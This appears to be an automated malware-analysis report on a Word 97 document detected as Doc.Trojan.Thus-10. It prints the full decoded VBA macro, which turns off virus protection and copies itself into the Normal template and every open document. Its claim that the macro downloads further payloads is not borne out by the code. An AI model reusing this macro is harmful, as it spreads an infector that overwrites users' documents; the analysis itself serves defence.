Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc70cf1df82a50f7…

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 99b1d1313f3351f2d5763c5991f41b2f SHA-1: d6414abe234c7aa2e5a1c1b843a1d10251ae33ac SHA-256: fc70cf1df82a50f7ecba98bc619ade6d3a159be3a131f8f7f823e0fd778467fe
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection 'Doc.Trojan.Thus-10' strongly suggests malicious intent. The macro code appears to be attempting to disable virus protection and potentially inject itself into other documents, indicating it's designed to download and execute further malicious content.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2210 bytes
SHA-256: 0992bd29fdd27b8e768cc23ead3f9d496798c699c772f7f42b022934df80129c
Detection
ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'AntiThus'
'Anti-Smyser'
' Ïðîãðàìà ïðèçíà÷åíà äëÿ çíåðàæåííÿ â³ðóñà 'Anti-Smyser'
    On Error Resume Next
    Application.Options.VirusProtection = False
 If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'AntiThus'" Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
        .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
        .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
        .Item(1).CodeModule.CountOfLines)
    End If
  
    
    CVD = 0
    For k = 1 To Application.Documents.Count
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'AntiThus'" Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
            .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        End If
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
            .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
            .VBComponents.Item(1).CodeModule.CountOfLines)
        End If
        CVD = CVD + 1
    Next k
    
   
    'Application.Options.VirusProtection = True
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.